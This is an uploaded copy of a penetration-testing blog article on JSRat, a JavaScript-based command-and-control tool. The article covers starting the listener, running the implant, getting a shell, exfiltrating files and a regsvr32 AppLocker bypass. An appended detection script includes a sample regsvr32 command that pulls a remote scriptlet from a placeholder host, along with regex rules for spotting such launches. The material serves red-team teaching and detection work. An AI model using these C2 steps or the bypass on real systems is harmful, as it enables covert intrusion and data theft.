Command and Control - JavaScript

The document discusses command and control tools that use JavaScript payloads and HTTP communication. It focuses on JSRat, a C2 tool with Python and PowerShell implementations that uses JavaScript implants and a web server to execute commands on target hosts or exfiltrate data.

Uploaded by

brunodiaz2038

Penetration Testing Lab

Articles from the Pentesting Field

Command and Control – JavaScript

January 8, 2018 | netbiosX | Red Team | C&C, C2, Command and Control, JSRat, Red Team

There are a number of command and control tools that can use a variety of methods to hide malicious traffic or execute implants in various formats. Casey Smith originally developed a prototype tool which uses JavaScript as a payload and connects back to a listening web server. A security researcher, 3gstudent, extended Casey Smith's work and developed JSRat in PowerShell, which provides some additional functionality. Other variations of this tool exist in Python, so the master host can be either a Linux or a Windows machine. Similarly, another C2 tool that can generate JavaScript implants is PoshC2 from Nettitude.

JSRat is a command and control tool which uses JavaScript payloads and the HTTP protocol for communication between the server and the target hosts. There are two implementations, one in Python and one in PowerShell, and their usage is described below.
Python

The Python implementation of JSRat starts a web server and waits for the client command to be executed:

    python MyJSRat.py -i 192.168.1.203 -p 8080

JSRat – Server

Once the user visits the Client Command URL, a connection will be established with the host. JSRat can be used to execute commands, run executables and scripts, or just for data exfiltration.

JSRat – Usage Options

In order to establish a proper shell, a JavaScript payload needs to be executed. This payload is stored on the URL below:

JSRat – Generated Command

The generated command needs to be executed from a command prompt.

JSRat – Implant Execution

Once the command is executed, a shell will be received.
JSRat – Console

Commands can be executed from the shell as normal.

JSRat – Command Execution

JSRat can also read, download or upload files.

JSRat – Data Exfiltration

Execution of executables and scripts can also be performed by following a sequence like:

1. run
2. calc.exe

JSRat – Run Executables

There is also another Python implementation of this tool which provides a method (regsvr32) of AppLocker bypass.

JSRat – AppLocker Bypass Method

The JSRat will generate and host a scriptlet file which will contain the payload.

PowerShell
Alternatively, there is also a PowerShell implementation of JSRat which can perform
the same operations from a PowerShell console. The script needs to be modified with the
IP address of the listener prior to any execution.

JSRat PowerShell – Server Listening

The payload command that needs to be executed on the target is also included in the
comments of the script.

JSRat PowerShell – Payload Command

Running the payload command will connect the target host and a console will be obtained.

JSRat PowerShell – Usage

Commands can be executed on the target as in any normal command prompt.

JSRat PowerShell – Command Execution

Conclusion
The major advantage of this command and control tool is that it doesn't need any implant to be written to disk. It is very fast and all the communication is done via HTTP, which is a common protocol. Since JSRat uses JavaScript payloads, detection is hard unless rundll32 is monitored. Enabling and configuring AppLocker to deny execution of rundll32 and regsvr32 will prevent the attack.
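
The monitoring mentioned above can be sketched as a triage pass over process-creation events. This is an added example, not code from the original post or from any JSRat project. It assumes Sysmon-style Image and CommandLine fields, and that the implant is launched through rundll32 with a script-protocol argument or through regsvr32 with a remote scriptlet; the rule set and all sample events are constructed.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields).
# Hosts and script bodies are placeholders, not real payloads.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"<script body elided>"'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /i:http://listener.example.invalid/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
]

# Assumed rule set: (rule name, binary file name, command-line pattern).
RULES = [
    ("rundll32 script-protocol handler", "rundll32.exe",
     re.compile(r"\b(?:javascript|vbscript):", re.I)),
    ("regsvr32 remote scriptlet", "regsvr32.exe",
     re.compile(r"/i:\s*\"?(?:https?|ftp)://", re.I)),
    ("regsvr32 loading scrobj.dll", "regsvr32.exe",
     re.compile(r"\bscrobj(?:\.dll)?\b", re.I)),
]

def match_rules(event):
    """Return the names of all rules that fire for one process-creation event."""
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    return [name for name, binary, pattern in RULES
            if image == binary and pattern.search(cmdline)]

def triage(events):
    """Return (index, image, fired rules) for every event that matches a rule."""
    hits = []
    for index, event in enumerate(events):
        fired = match_rules(event)
        if fired:
            hits.append((index, event["Image"], fired))
    return hits

if __name__ == "__main__":
    for index, image, fired in triage(SAMPLE_EVENTS):
        print(f"event {index}: {image} -> {', '.join(fired)}")
```

Matching on the Image file name misses renamed copies of these binaries; Sysmon's OriginalFileName field can be compared instead.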

Resources

https://github.com/aspiggy/JSRAT
https://github.com/Ridter/MyJSRat
https://github.com/Hood3dRob1n/JSRat-Py
https://github.com/3gstudent/Javascript-Backdoor
